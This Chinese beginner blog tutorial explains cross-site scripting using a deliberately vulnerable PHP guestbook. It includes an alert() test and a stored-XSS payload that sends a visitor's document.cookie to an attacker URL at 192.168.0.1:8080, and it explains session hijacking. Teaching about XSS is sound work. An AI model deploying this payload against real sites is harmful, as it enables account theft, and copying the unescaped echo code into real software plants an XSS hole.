Web安全漏洞简介之XSS(一)

来源:互联网 发布:淘宝首页自定义间隙 编辑:程序博客网 时间:2024/05/19 19:56

打算挖个坑,写点Web安全漏洞的东西,今天先填个XSS的,基础向,大神轻喷。
======
随着互联网流行,以及网站互动性的提高,像论坛、微博还有各种web2.0应用的兴起,很多网站都可以由用户或多或少的参与,可能很多的网站用户注册之后都可以评论、发帖等等。

当然这些都是对正常向的用户来说的,如果是一个攻击者当然不会老老实实的发帖子之类的了。
众所周知,现在看到的网页基本都是用html、javascript、css等技术在浏览器端展示的,所以如果一个黑客输入的不是正常的评论,而是一段html、javascript、css等的浏览器支持的代码会如何呢?
下面来做个实验,这里我找了了一个”小明“同学写的简陋的类似留言板的php程序,功能就是简单的把用户提交的东西 再显示回去。

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>测试页面</title>
</head>
<body>
<?php
if(empty($_REQUEST["T1"]) === false)
{
echo "用户留言:".$_REQUEST["T1"];
}
?>
<form method="POST" action="">
<p>留言:<br/>
<textarea class="area-text" style="width: 708px; height: 75px; overflow: hidden;" name="T1"></textarea></p>
<p><input type="submit" value="提交"></p>
</form>
</body>
</html>


打开后样子如下:

输入一个你好,上面的用户留言里会显示一个你好,下面来输入一点好玩的

于是当点击提交之后:

难道这里不应该是在用户留言里显示那句js代码么,让我们来看看页面的html代码在前后两次提交后有什么区别。
第一次:

很正常

第二次:

注意刚才提交的<script>alert("This is a xsscode")</script>直接就成为web页面代码的一部分。
在这里让我们来回顾下我们的留言板代码,处理用户提交内容的那部分

<?php
if(empty($_REQUEST["T1"]) === false)
{
echo "用户留言:".$_REQUEST["T1"];
}
?>

首先做了一个判断,检查参数T1是不是为空,
之后不为空就执行下面的回显语句,在”用户留言:“后面拼接了T1参数中的内容,再回显到页面上。

可以看到这里,这个粗心的”小明“同学没有对T1的内容做任何检查,就返回给了用户,尼玛起码也得过滤个敏感词啊,网站上面冒个xx功出来要被查水表的。

于是我们就接触到了第一个xss漏洞,也就是跨站脚本,英文Cross-Site Script,这里缩写为了和常见的css(层叠样式表)区分就使用了xss。

xss漏洞很常见,程序员粗心对传入的参数没有检查,或者检查了、处理了,但是狡猾的黑客通过种种手段绕过去了都会造成xss漏洞。

与其他一些漏洞不太相同的是,受到xss漏洞直接攻击的是浏览器端,也就是当一个黑客发起攻击后,实际执行攻击代码的是浏览网站的用户所使用的浏览器,在这个过程中网站的服务器只是起到了一个”帮凶“的作用。

那么这种漏洞有什么危害呢(小明:人也就是弹个框有什么大不了的?)
现在转换一下场景,小明的boss又让小明写了一个论坛程序,各种努力认真,最后搞出了一个炫酷的论坛,用户很多发帖踊跃,boss十分happy。但是他仍然没注意xss漏洞的问题。

让我们用事实来教育小明

我构造了这么一个帖子,标题就叫hello,内容是这样的:


helloworld
<script type=text/javascript>window.location = "http://192.168.0.1:8080/cookie.php?cookie="+document.cookie</script>


让我们发出去,等等看别人点开之后会发生什么
演示向的程序,我太懒就不整到数据库里存了,脑补下小明点链接的动作就好):

这是什么,小明同学的cookie啊,用户名和密码都大喇喇的写在那里,而且还暴露了小明同学暗恋刘你妹的事情。

让我们来看看这个过程中发生了什么,首先咱们肯定是那个js代码搞的鬼,一共有三个部分
第一,document.cookie,这里获取了来看贴子人的cookie;
第二, "http://192.168.0.1:8080/cookie.php?cookie="+document. cookie 这部将获取到的cookie拼到了那个网址里的一个名为“cookie”的字段里
第三,调用window.location将用户的浏览器指向了这个网址

所以最后达到的效果是:把用户的cookie提交给了http://192.168.0.1:8080/coo kie.php 这个网页。

这个网页干了什么呢,很简单的将cookie字段取出然后回显出来。

当然回显出来并不严重,但是如果他是悄悄的存起来了呢?

如果黑客再高级一点,修改一下那个发出去的js代码,利用创建一个图片,将图片地址拼合cookie字段值指向那个cookie.php,然后在cookie.php那里保存并返回一个正常的图片。
oh,no,terrible.
黑客拿到小明的cookie之后,填到他的浏览器里,就能利用小明的身份在论坛上为所欲为了。

看,xss漏洞有多可怕。
第一集 完
======================
可能有人会觉得:“光拿个Cookie弱~爆~了~,老纸的论坛账户没什么用,能奈我何”,可是如果你的浏览器有漏洞,而黑客发了帖子利用xss漏洞扔了段触发漏洞的js,给你按个偷游戏币、网银木马,就真的不好玩了。
而且可怕的是,你明明上的光明正大的论坛,甚至看的是党史党章三观正确无比的帖子,有漏洞的话都会悄无声息的中招。